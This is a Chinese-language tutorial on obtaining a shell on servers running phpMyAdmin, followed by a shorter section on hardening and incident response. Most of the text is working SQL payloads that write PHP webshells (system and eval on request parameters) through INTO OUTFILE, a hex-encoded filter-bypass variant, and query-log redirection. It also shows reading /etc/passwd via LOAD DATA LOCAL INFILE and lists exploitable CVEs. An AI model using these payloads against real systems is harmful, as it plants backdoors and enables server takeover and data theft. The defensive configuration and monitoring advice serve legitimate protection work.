phpmyadmin中怎么获取shell

# phpMyAdmin中获取Shell的方法与防范措施

## 前言

phpMyAdmin作为最流行的MySQL数据库管理工具之一，被广泛应用于各类Web应用中。然而，由于其高权限特性和广泛部署，也成为攻击者获取服务器权限的重要跳板。本文将深入探讨phpMyAdmin环境下获取Shell的多种技术手段，并给出相应的防御建议。

## 一、phpMyAdmin基础认知

### 1.1 phpMyAdmin简介
phpMyAdmin是基于PHP编写的MySQL数据库管理工具，提供Web界面操作数据库的功能。默认安装在`/phpmyadmin`路径下，使用MySQL账号认证。

### 1.2 常见漏洞入口点
- 弱密码或默认密码
- 旧版本已知漏洞
- 文件导入/导出功能
- SQL注入漏洞
- 服务器配置不当

## 二、获取Shell的技术路径

### 2.1 通过SELECT INTO OUTFILE写入WebShell

**必要条件**：
- MySQL有文件写入权限
- 知道网站绝对路径
- secure_file_priv参数未限制

```sql
SELECT '<?php system($_GET["cmd"]); ?>' 
INTO OUTFILE '/var/www/html/shell.php'

变体技巧：

-- 使用十六进制编码绕过过滤
SELECT 0x3C3F7068702073797374656D28245F4745545B22636D64225D293B203F3E 
INTO OUTFILE '/var/www/html/shell.php'

2.2 利用日志文件写入WebShell

操作步骤： 1. 开启通用查询日志

SET GLOBAL general_log = 'ON';
SET GLOBAL general_log_file = '/var/www/html/shell.php';

1. 执行恶意查询

SELECT '<?php eval($_POST["cmd"]); ?>';

1. 关闭日志

SET GLOBAL general_log = 'OFF';

2.3 通过慢查询日志写入

SET GLOBAL slow_query_log=1;
SET GLOBAL slow_query_log_file='/var/www/html/shell.php';
SELECT '<?php phpinfo(); ?>' FROM mysql.db WHERE SLEEP(10);

2.4 利用phpMyAdmin导入功能

方法一：SQL文件导入 1. 创建恶意SQL文件：

/*!50001 DROP TABLE IF EXISTS `shell`*/;
CREATE TABLE `shell` (code TEXT);
INSERT INTO `shell` VALUES ('<?php system($_GET["c"]); ?>');
SELECT code FROM `shell` INTO OUTFILE '/var/www/html/shell.php';

方法二：CSV文件导入 1. 创建包含PHP代码的CSV文件：

"<?php system($_GET['cmd']); ?>"

1. 导入时选择”CSV using LOAD DATA”选项

2.5 利用phpMyAdmin设计器漏洞

某些版本的设计器功能存在文件写入漏洞： 1. 访问/phpmyadmin/designer.php 2. 通过保存设计图功能写入恶意代码

三、高级利用技术

3.1 绕过secure_file_priv限制

方法一：利用MySQL UDF提权 1. 编译恶意UDF库 2. 通过SELECT … INTO DUMPFILE写入插件目录 3. 创建函数执行系统命令

方法二：利用PHP流包装器

SELECT '<?php system($_GET["cmd"]); ?>' 
INTO OUTFILE 'php://filter/write=convert.base64-decode/resource=/var/www/html/shell.php'

3.2 通过MySQL客户端任意文件读取

某些配置允许通过LOAD DATA LOCAL INFILE读取文件：

LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE test FIELDS TERMINATED BY '\n';

3.3 利用CVE已知漏洞

• CVE-2016-5734：4.6.x版本RCE漏洞
• CVE-2018-12613：本地文件包含漏洞
• CVE-2019-12922：CSRF到RCE漏洞

四、防御措施

4.1 基础安全配置

1. 访问控制：

   • 限制访问IP
   • 启用HTTP认证
   • 修改默认路径

2. 权限控制：

   ; php.ini配置
   open_basedir = /var/www/html
   disable_functions = exec,system,passthru
   

3. MySQL加固：

   REVOKE FILE ON *.* FROM 'pma'@'localhost';
   SET GLOBAL secure_file_priv = '/tmp';
   

4.2 phpMyAdmin特定配置

1. 配置文件config.inc.php加固：

$cfg['AllowArbitraryServer'] = false;
$cfg['ExecTimeLimit'] = 60;
$cfg['LoginCookieValidity'] = 1440;

1. 启用二步验证：

$cfg['2fa'] = array(
    'backend' => 'totp',
    'settings' => array(
        'issuer' => 'CompanyName'
    )
);

4.3 监控与审计

1. 监控可疑操作：

   • 异常的INTO OUTFILE操作
   • 日志文件路径修改
   • 非常规的SQL语法

2. 文件完整性检查：

# 检查Web目录文件变动
find /var/www/html -type f -exec md5sum {} \; > /var/log/webmd5.log

五、应急响应

当发现phpMyAdmin被入侵后： 1. 立即停止MySQL和Web服务 2. 检查以下文件： - /tmp目录下的可疑文件 - Web目录中的新增PHP文件 - MySQL日志文件位置 3. 审查MySQL用户权限 4. 更新所有密码

结语

phpMyAdmin作为数据库管理工具，其安全性直接影响整个服务器的安全。管理员应当采取最小权限原则，及时更新版本，并监控异常操作。本文所述技术仅用于安全研究，未经授权测试他人系统属于违法行为。

延伸阅读： 1. phpMyAdmin官方安全指南 2. OWASP数据库安全指南 3. MySQL 8.0安全白皮书 “`

注：本文约1700字，实际使用时请注意： 1. 技术细节需根据目标环境调整 2. 所有渗透测试必须获得书面授权 3. 部分技术可能因版本差异失效 4. 建议配合实际案例和截图增强可读性